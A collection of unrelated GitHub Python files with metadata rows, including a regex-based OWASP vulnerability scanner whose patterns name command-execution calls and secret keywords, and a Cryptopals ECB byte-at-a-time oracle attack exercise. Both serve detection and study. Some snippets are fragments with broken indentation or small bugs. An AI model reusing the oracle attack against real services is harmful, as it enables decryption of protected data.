outputs = model.generate(inputs, max_length=50, num_return_sequences=5, do_sample=True, temperature=0.7)
print("Generated text:")
for i, output in enumerate(outputs):
print(f"{i}: {tokenizer.decode(output)}")
|
mario872/Isaac-Voice-Assistant
|
main/Llama2.py
|
Llama2.py
|
py
| 612 |
python
|
en
|
code
| 0 |
github-code
|
6
|
29448499379
|
#input
num = input("please enter a number: ")
#remainders function: num modulo every candidate divisor from 2 to num-1
def remainders(a):
    return [int(a) % f for f in range(2, int(a))]
#function multiplying all ints in a list, returns 0 if the list contains at least one 0
def multiplyList(myList):
    result = 1
    for x in myList:
        result = result * x
    return result
#if the product is 0, some divisor left remainder 0, so num cannot be prime
if multiplyList(remainders(num)) == 0:
    print("dis no prime")
else:
    print("dis prime")
|
CheeseC4k3/practicepython
|
pythonexercise11.py
|
pythonexercise11.py
|
py
| 480 |
python
|
en
|
code
| 0 |
github-code
|
6
|
7259084876
|
import os
import re
# Define the OWASP Top 10 vulnerabilities patterns
OWASP_TOP_10 = {
"Injection": [
r"(?i)\b(?:select|insert|update|delete|drop|alter|create)\b[^;]*\b(?:from|into|where)\b",
r"(?i)\b(?:exec|eval|system|os\.popen|subprocess\.call)\b",
r"(?i)\b(?:<\?php|\$_(GET|POST|REQUEST|COOKIE))\b"
],
"Broken Authentication": [
r"(?i)\b(?:password|passwd|admin|login)\b"
],
"Sensitive Data Exposure": [
r"(?i)\b(?:apikey|secretkey|password|credentials)\b"
],
"XML External Entities (XXE)": [
r"(?i)\b<!ENTITY\b"
],
"Broken Access Control": [
r"(?i)\b(?:chmod|chown|chmod777)\b"
],
"Security Misconfiguration": [
r"(?i)\b(?:debug=True|verbose=True)\b"
],
"Cross-Site Scripting (XSS)": [
r"(?i)<\s*script\b[^>]*>[^<]*<\s*/\s*script\s*>",
r"(?i)\b(?:alert|document\.write|eval\(|javascript:|<\s*img\b[^>]*\sonerror\b)",
],
"Insecure Deserialization": [
r"(?i)\b(?:pickle|cPickle|unpickle|pyYAML|yaml\.load)\b"
],
"Using Components with Known Vulnerabilities": [
r"(?i)\b(?:django|flask|rails|struts|phpmyadmin)\b"
],
"Insufficient Logging and Monitoring": [
r"(?i)\b(?:print|console\.log)\b"
]
}
def scan_directory(directory):
vulnerabilities = []
for root, dirs, files in os.walk(directory):
for file in files:
file_path = os.path.join(root, file)
with open(file_path, "r", encoding="latin-1") as f:
content = f.read()
for vulnerability, patterns in OWASP_TOP_10.items():
for pattern in patterns:
matches = re.findall(pattern, content)
if matches:
vulnerabilities.append((file_path, vulnerability, matches))
return vulnerabilities
# Example usage
directory_to_scan = "E:/Repos/VulnerabilityScanner"
print(f"directory: {directory_to_scan}")
vulnerabilities_found = scan_directory(directory_to_scan)
if vulnerabilities_found:
for file_path, vulnerability, matches in vulnerabilities_found:
print(f"Vulnerability: {vulnerability}")
print(f"File: {file_path}")
print("Matches:")
for match in matches:
print(match)
print()
else:
print("No vulnerabilities found.")
|
asbuch99/VulnerabilityScanner
|
VulnScanner.py
|
VulnScanner.py
|
py
| 2,364 |
python
|
en
|
code
| 1 |
github-code
|
6
|
40695193074
|
# coding: utf-8
from db import db
from models.revision import Revision, RevisionItem
from services.core import BaseSQLAlchemyModelService
__author__ = 'StasEvseev'
class RevisionService(BaseSQLAlchemyModelService):
model = Revision
class RevisionServiceException(
BaseSQLAlchemyModelService.ServiceException):
pass
@classmethod
def exists_point(cls, pointsale_id, id):
return cls.model.query.filter(
Revision.pointsale_id == pointsale_id,
Revision.id != id).count() > 0
@classmethod
def initial_revision(cls, obj):
"""
Инициализация ревизии. Если вдруг ревизия не первая, то нужно заполнить
позиции ревизии пунктами из точки.
"""
from applications.point_sale.service import PointSaleService
try:
pointsale_id = obj.pointsale_id
if pointsale_id and cls.exists_point(pointsale_id, obj.id):
items = PointSaleService.items_pointsale(pointsale_id)
for item in items:
rev_item = RevisionService.create_item(
obj.id, item.good_id, item.count)
db.session.add(rev_item)
except Exception as exc:
raise RevisionService.RevisionServiceException(unicode(exc))
@classmethod
def sync_to_point(cls, obj):
from applications.point_sale.service import PointSaleService
try:
pointsale_id = obj.pointsale_id
exc_items = []
if pointsale_id:
for item in obj.items:
pointitem = PointSaleService.sync_good(
pointsale_id, item.good_id, item.count_after)
exc_items.append(pointitem.id)
PointSaleService.none_count(pointsale_id, exc_items)
except Exception as exc:
raise RevisionService.RevisionServiceException(unicode(exc))
@classmethod
def create_item(cls, revision_id, good_id, count):
return RevisionItem(revision_id=revision_id, good_id=good_id,
count_before=count)
|
StasEvseev/adminbuy
|
services/revisionservice.py
|
revisionservice.py
|
py
| 2,224 |
python
|
en
|
code
| 0 |
github-code
|
6
|
30367059061
|
from contextlib import contextmanager
import sys
import traceback
# ######### Testing tools
@contextmanager
def store_exceptions_on_all_threads():
"""Context manager that captures all exceptions, even those coming from
the UI thread. On exit, the first exception is raised (if any).
"""
exceptions = []
def excepthook(type, value, tb):
exceptions.append(value)
message = "Uncaught exception:\n"
message += "".join(traceback.format_exception(type, value, tb))
sys.stderr.write(message)
try:
sys.excepthook = excepthook
yield
    finally:
        # restore the default hook before (possibly) re-raising, so a failure
        # does not leave the custom hook installed
        sys.excepthook = sys.__excepthook__
        if len(exceptions) > 0:
            raise exceptions[0]
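# Usage sketch (illustration only, not part of the chaco test suite): code that
# routes errors through sys.excepthook -- as GUI event loops do -- has the first
# such error re-raised when the context exits.
def _demo():
    with store_exceptions_on_all_threads():
        try:
            1 / 0
        except ZeroDivisionError:
            sys.excepthook(*sys.exc_info())  # what a toolkit's event loop would do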
|
enthought/chaco
|
chaco/tests/_tools.py
|
_tools.py
|
py
| 725 |
python
|
en
|
code
| 286 |
github-code
|
6
|
39287424615
|
import array
# check the following code for typecode for converting arrays into bytes
# and then cast bytes into memoryview object.
# https://docs.python.org/3/library/array.html
b = bytes(array.array("i", [1, 2, 3]))
print(b)
d = memoryview(b).cast("i")
# a memoryview behaves like an array, so we can unpack it with *.
print(*d)
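# A further sketch: a bytearray-backed view is writable, so cast("i") lets us
# update the integers in place without copying.
buf = bytearray(array.array("i", [1, 2, 3]))
view = memoryview(buf).cast("i")
view[0] = 99
print(*view)  # 99 2 3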
|
1995parham-learning/python101
|
memory-view/main.py
|
main.py
|
py
| 332 |
python
|
en
|
code
| 3 |
github-code
|
6
|
1112432236
|
import numpy as np
from PIL import Image
import re
from wordcloud import WordCloud, ImageColorGenerator, STOPWORDS
import matplotlib.pyplot as plt
mask = plt.imread('b.jpg')
#read the utf-8 encoded input text file
fo=open('input.txt', 'r', encoding='utf-8')
strThousand = fo.read().lower()
fo.close()
#print(strThousand)
print("222")
#字符串预处理: #大小写#标点符号#特殊符号
sep = "."
for ch in sep:
strThousand = strThousand.replace(ch, ' ')
sep = "\""
for ch in sep:
strThousand = strThousand.replace(ch, ' ')
sep = "\'"
for ch in sep:
strThousand = strThousand.replace(ch, ' ')
sep = ","
for ch in sep:
strThousand = strThousand.replace(ch, ' ')
sep = "<"
for ch in sep:
strThousand = strThousand.replace(ch, ' ')
print("222")
#split the text into a word list
strList = strThousand.split()
#print(len(strList), strList)
#build the set of distinct words for counting
strSet = set(strList)
exclude = {'a', 'the', 'and', 'i', 'you', 'in'} #exclude function words: pronouns, articles, conjunctions and other words with no content meaning
strSet = strSet - exclude
#print(len(strSet), strSet)
strDict = {}
for word in strSet:
    strDict[word] = strList.count(word)
#print(len(strDict), strDict)
wcList = list(strDict.items())
#print(wcList)
wcList.sort(key=lambda x: x[1], reverse=True) #sort by word frequency, descending
#print(wcList)
for i in range(50): #print the TOP 50
    print(wcList[i])
#WordCloud.generate expects raw text, so build the cloud from the frequency dict instead
my_wordcloud = WordCloud(scale=4, mask=mask, background_color='white',
             max_words=50, max_font_size=60, random_state=20).generate_from_frequencies(strDict)
#display the generated word cloud
plt.imshow(my_wordcloud)
plt.axis("off")
plt.show()
#save the generated image
my_wordcloud.to_file('result.jpg')
|
Wang993/code_
|
code/ENGLISH WORD FRUQUECY_wordcloud.py
|
ENGLISH WORD FRUQUECY_wordcloud.py
|
py
| 1,768 |
python
|
en
|
code
| 0 |
github-code
|
6
|
27250414296
|
from django.contrib import admin
from django.urls import path, include
from django.conf.urls.static import static
from django.conf import settings
from drf_yasg.views import get_schema_view
from rest_framework.permissions import AllowAny
from drf_yasg import openapi
schema_url_v1_patterns = [
    # path() takes plain routes, not regexes, so the former '^' anchors are dropped
    path('api/auth/', include('authentication.urls')),
    path('api/community/', include('community.urls')),
    path('api/feature/', include('feature.urls')),
    path('api/account/', include('account.urls')),
    path('api/recommendation/', include('recommendation.urls')),
]
schema_view_v1 = get_schema_view(
openapi.Info(
title="NYOM Open API",
default_version='v1',
description="NYOM Open API Docs",
terms_of_service="https://www.google.com/policies/terms/",
license=openapi.License(name="License"),
),
validators=['flex'], #'ssv'],
public=True,
permission_classes=(AllowAny,),
patterns=schema_url_v1_patterns,
)
urlpatterns = [
path('admin/', admin.site.urls),
#path('', )
path('api/auth/', include('authentication.urls')),
path('api/community/', include('community.urls')),
path('api/feature/', include('feature.urls')),
path('api/account/', include('account.urls')),
path('api/recommendation/', include('recommendation.urls')),
# Auto DRF API docs
# path(r'swagger(?P<format>\.json|\.yaml)', schema_view_v1.without_ui(cache_timeout=0), name='schema-json'),
    path('swagger', schema_view_v1.with_ui('swagger', cache_timeout=0), name='schema-swagger-ui'),
    path('redoc', schema_view_v1.with_ui('redoc', cache_timeout=0), name='schema-redoc-v1'),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
moon-hy/lunch-recommendation
|
config/urls.py
|
urls.py
|
py
| 1,754 |
python
|
en
|
code
| 0 |
github-code
|
6
|
8397431053
|
import os
from colander import (
    MappingSchema,
    SchemaNode,
    String
)
from deform import (
    Form,
    ValidationFailure
)
here = os.path.dirname(os.path.abspath(__file__))
class UserSchema(MappingSchema):
name = SchemaNode(String(),
description = 'Be comfortable here')
surname = SchemaNode(String(),
description = 'Be comfortable here')
email = SchemaNode(String(),
description = 'Be comfortable here')
def form_view(request):
schema = UserSchema()
myform = Form(schema, buttons=('submit',))
template_values = {}
template_values.update(myform.get_widget_resources())
if 'submit' in request.POST:
controls = request.POST.items()
try:
myform.validate(controls)
except ValidationFailure as e:
template_values['form'] = e.render()
else:
template_values['form'] = 'OK'
return template_values
template_values['form'] = myform.render()
return template_values
|
tennisracket/bonkh
|
bonkh/bonkh/app.py
|
app.py
|
py
| 1,227 |
python
|
en
|
code
| 0 |
github-code
|
6
|
73758139386
|
"""Docstring"""
import os
import ezdxf
from .file_utilities import check_file
def check_file_and_folder(
path, save_path, save=True
) -> list[ezdxf.document.Drawing] | None:
"""
Handle file or folder to apply the cleaning process
"""
if os.path.isdir(path):
list_dir = os.listdir(path)
try:
os.mkdir(save_path)
except FileExistsError:
pass
docs = []
for name in list_dir:
npath = os.path.join(path, name)
docs.append(check_file_and_folder(npath, os.path.join(save_path, name)))
else:
if check_file(path):
doc = ezdxf.readfile(path)
clean(doc)
if save:
doc.saveas(save_path)
docs = [doc]
else:
docs = None
print(f"{path} is not a dxf file")
return docs
def clean(doc: ezdxf.document.Drawing) -> None:
"""Apply functions to clean the doc"""
remove_sw(doc)
def remove_sw(doc: ezdxf.document.Drawing) -> None:
"""Remove the text included by solidworks from the doc file"""
blocks = doc.blocks
for bloc in blocks:
for entity in bloc:
if entity.dxftype() == "MTEXT":
if "SOLIDWORKS" in entity.text:
bloc.delete_entity(entity)
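# Usage sketch (paths are assumptions): from the package this module belongs to,
#   from .dxf_utilities import check_file_and_folder
#   docs = check_file_and_folder("drawings", "cleaned", save=True)
# cleans every .dxf found under ./drawings and saves the results under ./cleaned.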
|
ldevillez/pySwTools
|
pyswtools/ready_dxf/dxf_utilities.py
|
dxf_utilities.py
|
py
| 1,326 |
python
|
en
|
code
| 3 |
github-code
|
6
|
35070389629
|
import shutil, errno, os
def copy(src, dst):
try:
shutil.copytree(src, dst)
except OSError as exc: # python >2.5
if exc.errno == errno.ENOTDIR:
shutil.copy(src, dst)
else: raise
def merge(src_dir, dest_dir):
    #http://stackoverflow.com/questions/7419665/python-move-and-overwrite-files-and-folders
    for root, dirs, files in os.walk(src_dir):
        # replace only the tree-root prefix; shadowing src_dir with the walk
        # variable would collapse every subfolder into dest_dir
        dst_dir = root.replace(src_dir, dest_dir, 1)
        if not os.path.exists(dst_dir):
            os.mkdir(dst_dir)
        for file_ in files:
            src_file = os.path.join(root, file_)
            dst_file = os.path.join(dst_dir, file_)
            if os.path.exists(dst_file):
                os.remove(dst_file)
            shutil.move(src_file, dst_dir)
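# Usage sketch (directory names are made up): copy a tree, then merge another tree
# into it, overwriting any files that already exist at the destination.
if __name__ == "__main__":
    copy("src_tree", "dst_tree")
    merge("extra_tree", "dst_tree")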
|
jsdelivr/cleaner
|
cleaner/utils/copy.py
|
copy.py
|
py
| 737 |
python
|
en
|
code
| 1 |
github-code
|
6
|
73507090108
|
#!/usr/bin/python
# -*- coding: utf8 -*-
# the shebang declares the interpreter; the coding line prevents errors from non-ASCII comments
# loops: for   -> the number of iterations is known in advance
#        while -> the number of iterations cannot be predicted
# for   : set the iteration count up front or per situation
# while : repeat until a specific condition is reached
# C-style: for (init; condition; step) --> for: predictable
# Python uses the enhanced for statement instead:
#   for variable in sequence (list, tuple)
# range() is Python's sequence generator:
#   range(start, stop, step)
# a = range(5)    ---> one argument: stop
# print(a)
# range(0, 5)     ---> two arguments: (start, stop)
# Code.01
for i in range(5): # iteration count: the number of elements in the range sequence
print(i)
# Code.02
for i in range(-1, 5):
print(i)
# Code.03
for i in range(-1, 5, 2):
print(i)
# Code.04
a = [1,2,4,6,8,9,2]
for i in a:
print(i)
# Code.05
# example: an arcade machine
# 1. for   : game cost 500 won ---> each inserted coin has a fixed value of 100 won;
#            the game starts once five 100-won coins have been inserted
# 2. while : game cost 500 won ---> the inserted amount varies (up to the user)
total = 500
coin = 100
sum = 0
money = 0
cnt = int(total/coin)
for i in range(cnt):
    money = int(input("Please insert a coin: "))
if money != 100:
cnt = cnt - 1
print("동전 좀 제대로 넣으세요(잘못 넣은 금액은 수수료)")
continue
sum = sum + money
if sum >= total:
print("게임 시작")
# Code.06
# Using list comprehensions makes the program more convenient and intuitive
result = [x for x in range(1,10)]
print(result)
# Code.07
for i in range(1,10): # ① outer for loop
    for j in range(1, 10): # ② inner for loop
print(i*j, end=" ")
print('')
# Code.08
for x in range(1, 10):
print(x)
print("빠져나가기")
break
|
Fhwang0926/class
|
python/basic/class_study_for.py
|
class_study_for.py
|
py
| 2,118 |
python
|
ko
|
code
| 0 |
github-code
|
6
|
41417945016
|
#!/usr/bin/env python3
# Cryptopals Challenge, Set 2, Challenge 12
# CJ Guttormsson
# 2017-01-03
import sys
sys.path.append('..')
from common import (get_random_key, base64_to_bytes, aes_128_ecb_encrypt,
guess_mode, pkcs7_pad)
import random
import itertools
#############
# CONSTANTS #
#############
# A random but constant key
UNKNOWN_KEY = get_random_key()
# The given data, that is not known in its decoded form
UNKNOWN_DATA = base64_to_bytes("""
Um9sbGluJyBpbiBteSA1LjAKV2l0aCBteSByYWctdG9wIGRvd24gc28gbXkg
aGFpciBjYW4gYmxvdwpUaGUgZ2lybGllcyBvbiBzdGFuZGJ5IHdhdmluZyBq
dXN0IHRvIHNheSBoaQpEaWQgeW91IHN0b3A/IE5vLCBJIGp1c3QgZHJvdmUg
YnkK""")
#################
# NEW FUNCTIONS #
#################
def encrypt_ecb_with_unknowns(data: bytes) -> bytes:
"""Pad given data with the unknown data and encrypt with the unknown key"""
return aes_128_ecb_encrypt(data + UNKNOWN_DATA, UNKNOWN_KEY)
def guess_block_length(alg) -> int:
"""Given an encryption algorithm, guess the block length it uses."""
# Guess by observing how the size of the output text, which is always a
# multiple of the block length, changes.
last_length = len(alg(b''))
for data_length in itertools.count(1):
new_length = len(alg(b'\0' * data_length))
if new_length > last_length:
return new_length - last_length
def guess_unknown_string(alg) -> bytes:
"""Given the algorithm above, find the unknown data."""
assert guess_mode(alg) == 'ECB'
block_length = guess_block_length(alg)
# Guess one character at a time by shifting the unknown text so that only
# one unknown character is in the block we are looking at
known_bytes = b''
while True:
# figure out how much padding we need, and which block we're looking at
empty_block = bytes(block_length - (len(known_bytes) % 16) - 1)
start = (len(known_bytes) // 16) * 16
# Create a lookup table for each possible byte (result block -> byte)
results = {}
for possible_byte in (bytes([b]) for b in range(256)):
result = alg(empty_block+known_bytes+possible_byte)[start:start+16]
results[result] = possible_byte
# Look at what the answer should be, then use that to figure out
# which possible byte was correct
expected_block = alg(empty_block)[start:start+16]
if expected_block in results:
known_bytes += results[expected_block]
else:
break
# We must remove the last byte, since it will always be an extraneous
# \x01. This happens because of pkcs7 padding (but doesn't extend to
# \x02 or further because that causes the \x01 to change, rendering
# all guessed blocks invalid).
return known_bytes[:-1]
########
# MAIN #
########
def main():
# Determine block length
block_length = guess_block_length(encrypt_ecb_with_unknowns)
assert block_length == 16
# Determine the algorithm being used
assert guess_mode(encrypt_ecb_with_unknowns) == 'ECB'
    # Recover the unknown appended data
assert guess_unknown_string(encrypt_ecb_with_unknowns) == UNKNOWN_DATA
print('Challenge 12 completed successfully.')
if __name__ == '__main__':
main()
|
cjguttormsson/cryptopals
|
set2/challenge12.py
|
challenge12.py
|
py
| 3,257 |
python
|
en
|
code
| 1 |
github-code
|
6
|
20723823317
|
# Exercise 1 : What Are You Learning ?
#
# 1. Write a function called display_message() that prints one sentence telling everyone what you are learning in this course.
# 2. Call the function, and make sure the message displays correctly.
def display_message() :
print("I'm trying to become a web developer")
display_message()
# Exercise 2: What’s Your Favorite Book ?
#
# 1. Write a function called favorite_book() that accepts one parameter called title.
# 2. The function should print a message, such as "One of my favorite books is <title>".
# For example: “One of my favorite books is Alice in Wonderland”
# 3. Call the function, make sure to include a book title as an argument when calling the function.
def favorite_book(book_title) :
print(f"One of my favorite books is {book_title}")
book = input("What are you reading? ")
favorite_book(book)
# Exercise 3 : Some Geography
#
# 1. Write a function called describe_city() that accepts the name of a city and its country as parameters.
# 2. The function should print a simple sentence, such as "<city> is in <country>".
# For example “Reykjavik is in Iceland”
# 3. Give the country parameter a default value.
# 4. Call your function.
def describe_city(city, country = "Israel") :
print(f"{city} is in {country}")
describe_city(input("City name: "))
# Exercise 4 : Random
#
# 1. Create a function that accepts a number between 1 and 100 and generates another number randomly between 1 and 100.
# 2. Compare the two numbers, if it’s the same number, display a success message,
# otherwise show a fail message and display both numbers.
import random
def compare_numbers(num):
rand_num = random.randint(1, 100)
if num == rand_num:
print("Success! You guessed the number.")
else:
print("Fail! The numbers are different.")
print(f"Your number was: {num}. And win number was: {rand_num}")
compare_numbers(50)
# Exercise 5 : Let’s Create Some Personalized Shirts !
#
# 1. Write a function called make_shirt() that accepts a size and the text of a message that should be printed on the shirt.
# 2. The function should print a sentence summarizing the size of the shirt and the message printed on it, such as
# "The size of the shirt is <size> and the text is <text>"
# 3. Call the function make_shirt().
# 4. Modify the make_shirt() function so that shirts are large by default with a message that reads “I love Python” by default.
# 5. Make a large shirt with the default message
# 6. Make medium shirt with the default message
# 7. Make a shirt of any size with a different message.
# Bonus: Call the function make_shirt() using keyword arguments.
def make_shirt(size = "large", massage = "I love Python") :
print(f"The size of the shirt is {size} and the text is {massage}")
make_shirt("XL", "Marvel")
make_shirt()
make_shirt("medium")
make_shirt(size = "Small", massage = "I always want to sleep... zzz")
# Exercise 6 : Magicians …
#
# 1. Using this list of magician’s names. magician_names = ['Harry Houdini', 'David Blaine', 'Criss Angel']
# 2. Pass the list to a function called show_magicians(), which prints the name of each magician in the list.
# 3. Write a function called make_great() that modifies the list of magicians by adding the phrase "the Great"
# to each magician’s name.
# 4. Call the function make_great().
# 5. Call the function show_magicians() to see that the list has actually been modified.
magician_names = ['Harry Houdini', 'David Blaine', 'Criss Angel']
def show_magicians(name_list) :
for name in name_list :
print(name)
show_magicians(magician_names)
def make_great(name_list) :
for i in range(len(name_list)) :
name_list[i] = "The Great " + name_list[i]
make_great(magician_names)
show_magicians(magician_names)
# Exercise 7 : Temperature Advice
#
# 1. Create a function called get_random_temp().
# 1. This function should return an integer between -10 and 40 degrees (Celsius), selected at random.
# 2. Test your function to make sure it generates expected results.
# 2. Create a function called main().
# 1. Inside this function, call get_random_temp() to get a temperature, and store its value in a variable.
# 2. Inform the user of the temperature in a friendly message, eg. “The temperature right now is 32 degrees Celsius.”
# 3. Let’s add more functionality to the main() function. Write some friendly advice relating to the temperature:
# 1. below zero (eg. “Brrr, that’s freezing! Wear some extra layers today”)
# 2. between zero and 16 (eg. “Quite chilly! Don’t forget your coat”)
# 3. between 16 and 23
# 4. between 24 and 32
# 5. between 32 and 40
# 4. Change the get_random_temp() function:
# 1. Add a parameter to the function, named ‘season’.
# 2. Inside the function, instead of simply generating a random number between -10 and 40,
# set lower and upper limits based on the season, eg. if season is ‘winter’,
# temperatures should only fall between -10 and 16.
# 3. Now that we’ve changed get_random_temp(), let’s change the main() function:
# 1. Before calling get_random_temp(), we will need to decide on a season,
# so that we can call the function correctly. Ask the user to type in a season -
# ‘summer’, ‘autumn’ (you can use ‘fall’ if you prefer), ‘winter’, or ‘spring’.
# 2. Use the season as an argument when calling get_random_temp().
# 5. Bonus: Give the temperature as a floating-point number instead of an integer.
# 6. Bonus: Instead of asking for the season, ask the user for the number of the month (1 = January, 12 = December). Determine the season according to the month.
import random
def get_random_temp(season):
if season == 'winter':
return round(random.uniform(-10, 16), 1)
elif season == 'spring' or season == 'autumn' or season == 'fall':
return round(random.uniform(0, 23), 1)
elif season == 'summer':
return round(random.uniform(16, 40), 1)
else:
return "Invalid season"
def main():
month = int(input("Enter the number of the month (1-12): "))
if month in [12, 1, 2]:
season = 'winter'
elif month in [3, 4, 5]:
season = 'spring'
elif month in [6, 7, 8]:
season = 'summer'
elif month in [9, 10, 11]:
season = 'autumn'
else:
print("Invalid month")
return
temperature = get_random_temp(season)
if isinstance(temperature, str):
print(temperature)
else:
print("The temperature right now is", temperature, "degrees Celsius.")
if temperature < 0:
print("Brrr, that’s freezing! Wear some extra layers today")
        elif 0 <= temperature < 16:
            print("Quite chilly! Don’t forget your coat")
        elif 16 <= temperature < 24:
            print("The weather is pleasant")
        elif 24 <= temperature < 32:
            print("It's quite warm today, stay hydrated")
else:
print("It's very hot! Stay indoors if possible")
main()
|
Alex-Rabaev/DI-Bootcamp
|
week 2/Day 4/ExercisesXP/w2d4exerciseXP.py
|
w2d4exerciseXP.py
|
py
| 7,262 |
python
|
en
|
code
| 1 |
github-code
|
6
|
43724375221
|
import sys
from PySide6.QtGui import QGuiApplication
from PySide6.QtQml import QQmlApplicationEngine, qmlRegisterType
from ppt import Maker
if __name__ == "__main__":
app = QGuiApplication(sys.argv)
qmlRegisterType(Maker, "ppt", 1, 0, "Maker")
engine = QQmlApplicationEngine()
engine.load('main.qml')
if not engine.rootObjects():
sys.exit(-1)
exit_code = app.exec()
del engine
sys.exit(exit_code)
|
JunTae90/MinChae
|
main.py
|
main.py
|
py
| 400 |
python
|
en
|
code
| 0 |
github-code
|
6
|
21485752439
|
# import heapq
from typing import List
from collections import deque
class Solution:
    def ladderLength(self, beginWord: str, endWord: str, wordList: List[str]) -> int:
        wordList = set(wordList)
        if endWord not in wordList:
            return 0
# def getdist(x, y):
# count = 0
# for i in range(len(x)):
# if x[i] != y[i]:
# count += 1
# return count
queue = deque([])
queue.append(beginWord)
level = 1
while queue:
size = len(queue)
for i in range(size):
word = queue.popleft()
if word == endWord:
return level
else:
for j in range(len(word)):
temp = list(word)
for k in range(26):
if chr(ord('a') + k) != temp[j]:
temp[j] = chr(ord('a') + k)
newword = "".join(temp)
if newword in wordList:
queue.append(newword)
wordList.remove(newword)
level += 1
return 0
# My first instinct for this problem was BFS, but the first version timed out. I spent a long time suspecting my BFS itself was inefficient and tried heapq-based heuristic search, but it kept timing out, and the heuristic even returns wrong results on some cases unless level is the first sort key.
# After reading the solution, the key turns out to be how you compute the distance of **changing exactly one character**. My approach compared every pair of words, giving a complexity of wordlen * n * n.
# A neater method: for each word, generate every word at distance one and check whether it is in the remaining dict. Since a hash lookup is O(1), the complexity is only wordlen * 26 * n, a clear improvement when n is large.
# So the key lesson here: I forgot to use a hash set to store these words; its O(1) lookup time is excellent!
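# A minimal sketch of a related neighbor scheme, assuming the same inputs:
# bucket words by wildcard patterns ("h*t", "*ot", ...) so distance-one
# neighbors are found by hashing instead of trying 26 letters per position.
# Illustration only, not the accepted solution above.
from collections import defaultdict

def ladder_length_buckets(beginWord, endWord, wordList):
    words = set(wordList)
    if endWord not in words:
        return 0
    buckets = defaultdict(list)  # pattern -> words matching the pattern
    for w in words | {beginWord}:
        for i in range(len(w)):
            buckets[w[:i] + '*' + w[i + 1:]].append(w)
    queue = deque([(beginWord, 1)])
    seen = {beginWord}
    while queue:
        word, level = queue.popleft()
        if word == endWord:
            return level
        for i in range(len(word)):
            for nxt in buckets[word[:i] + '*' + word[i + 1:]]:
                if nxt not in seen:
                    seen.add(nxt)
                    queue.append((nxt, level + 1))
    return 0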
|
bboychencan/Algorithm
|
leetcode/127.py
|
127.py
|
py
| 2,238 |
python
|
zh
|
code
| 0 |
github-code
|
6
|
43633665683
|
# pylint: disable=no-self-use,invalid-name
from __future__ import division
from __future__ import absolute_import
import pytest
from allennlp.data.dataset_readers.conll2003 import Conll2003DatasetReader
from allennlp.common.util import ensure_list
from allennlp.common.testing import AllenNlpTestCase
class TestConll2003Reader(object):
@pytest.mark.parametrize(u"lazy", (True, False))
@pytest.mark.parametrize(u"coding_scheme", (u'IOB1', u'BIOUL'))
def test_read_from_file(self, lazy, coding_scheme):
conll_reader = Conll2003DatasetReader(lazy=lazy, coding_scheme=coding_scheme)
instances = conll_reader.read(unicode(AllenNlpTestCase.FIXTURES_ROOT / u'data' / u'conll2003.txt'))
instances = ensure_list(instances)
if coding_scheme == u'IOB1':
expected_labels = [u'I-ORG', u'O', u'I-PER', u'O', u'O', u'I-LOC', u'O']
else:
expected_labels = [u'U-ORG', u'O', u'U-PER', u'O', u'O', u'U-LOC', u'O']
fields = instances[0].fields
tokens = [t.text for t in fields[u'tokens'].tokens]
assert tokens == [u'U.N.', u'official', u'Ekeus', u'heads', u'for', u'Baghdad', u'.']
assert fields[u"tags"].labels == expected_labels
fields = instances[1].fields
tokens = [t.text for t in fields[u'tokens'].tokens]
assert tokens == [u'AI2', u'engineer', u'Joel', u'lives', u'in', u'Seattle', u'.']
assert fields[u"tags"].labels == expected_labels
|
plasticityai/magnitude
|
pymagnitude/third_party/allennlp/tests/data/dataset_readers/conll2003_dataset_reader_test.py
|
conll2003_dataset_reader_test.py
|
py
| 1,471 |
python
|
en
|
code
| 1,607 |
github-code
|
6
|
11826395530
|
# Example Keplerian fit configuration file
# Required packages for setup
import os
import pandas as pd
import numpy as np
import radvel
# Define global planetary system and dataset parameters
starname = 'HD217014'
nplanets = 1 # number of planets in the system
instnames = ['j'] # list of instrument names. Can be whatever you like but should match 'tel' column in the input file.
ntels = len(instnames) # number of instruments with unique velocity zero-points
fitting_basis = 'per tc secosw sesinw k' # Fitting basis, see radvel.basis.BASIS_NAMES for available basis names
bjd0 = 2.44e6 + 3927.050417
planet_letters = {1: 'b'}
# Define prior centers (initial guesses) here.
params = radvel.RVParameters(nplanets,basis='per tc e w k') # initialize RVparameters object
params['per1'] = 4.23078166873 # period of 1st planet
params['tc1'] = 2072.79438 # time of inferior conjunction of 1st planet
params['e1'] = 0.00          # eccentricity of 1st planet
params['w1'] = np.pi/2. # argument of periastron of the star's orbit for 1st planet
params['k1'] = 35.7 # velocity semi-amplitude for 1st planet
params['dvdt'] = 0.0 # slope
params['curv'] = 0.0 # curvature
params['gamma_j'] = 1.0      # velocity zero-point for instrument 'j' (hires_rj)
params['jit_j'] = 2.6        # jitter term for instrument 'j' (hires_rj)
# Load radial velocity data, in this example the data is contained in a csv file;
# the resulting dataframe must have 'time', 'mnvel', 'errvel', and 'tel' keys
# path = os.path.join(radvel.DATADIR,'epic203771098.csv')
data = pd.read_csv('C:/users/rscsa/Research/radvel-master/HD217014/HD217014.csv')
data['time'] = data.time
data['mnvel'] = data.mnvel
data['errvel'] = data.errvel
data['tel'] = 'j'
# print data['time']
# Set parameters to be held constant (default is for all parameters to vary). Must be defined in the fitting basis
vary = dict(
#dvdt =False,
curv =False,
#jit_j =False,
#per1 =False,
#tc1 =False,
#secosw1 =False,
#sesinw1 = False,
#e1=False,
#w1=False,
#k1=False
# per2 = False,
# tc2 = False,
# secosw2 = False,
# sesinw2 = False
)
# Define prior shapes and widths here.
priors = [
radvel.prior.EccentricityPrior( nplanets ), # Keeps eccentricity < 1
radvel.prior.PositiveKPrior( nplanets ), # Keeps K > 0
    radvel.prior.Gaussian('tc1', params['tc1'], 300),    # Gaussian prior on tc1 with center at tc1 and width 300 days
radvel.prior.Gaussian('per1', params['per1'], 1),
# radvel.prior.Gaussian('tc2', params['tc2'], 0.01),
# radvel.prior.Gaussian('per2', params['per2'], 0.01),
radvel.prior.HardBounds('jit_j', 0.0, 15.0)
]
time_base = np.mean([np.min(data.time), np.max(data.time)]) # abscissa for slope and curvature terms (should be near mid-point of time baseline)
# optional argument that can contain stellar mass and
# uncertainties. If not set, mstar will be set to nan.
# stellar = dict(mstar=1.12, mstar_err= 0.05)
# optional argument that can contain planet radii, used for computing densities
# planet = dict(
# rp1=5.68, rp_err1=0.56,
# rp2=7.82, rp_err2=0.72,
# )
|
ruben-santana/Astro-Research
|
HD217014/HD217014.py
|
HD217014.py
|
py
| 3,206 |
python
|
en
|
code
| 0 |
github-code
|
6
|
71888988667
|
"""
需要备份的文件和目录由一个列表指定。
备份应该保存在主备份目录中。
文件备份成一个zip文件。
zip存档的名称是当前的日期和时间。
